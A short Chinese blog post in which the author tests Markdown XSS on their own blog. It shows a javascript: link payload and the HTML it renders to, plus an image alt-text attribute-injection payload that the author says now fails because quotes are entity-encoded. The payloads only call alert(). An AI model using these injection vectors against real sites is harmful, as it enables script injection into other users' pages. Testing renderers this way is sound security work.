C1imber's Blog

测试一下Markdown Xss

字数统计: 97阅读时长: 1 min
2018/10/22 Share

测试一下Markdown xss

插入超链接

我的博客

代码

1
[我的博客](javascript:alert`1`)

解析后

1
<a href="javascript:alert`1`" target="_blank" rel="external">我的博客</a>

加载图片

之前加载图片的XSS现在已经不行了,引号和尖括号被实体编码了
一张图片" onload=alert(1)//

代码

1
![一张图片" onload=alert(1)//](http://p008biu9n.bkt.clouddn.com/blog/181023/iDiiF5dJcF.png)
CATALOG
  1. 1. 测试一下Markdown xss
    1. 1.0.1. 插入超链接
    2. 1.0.2. 加载图片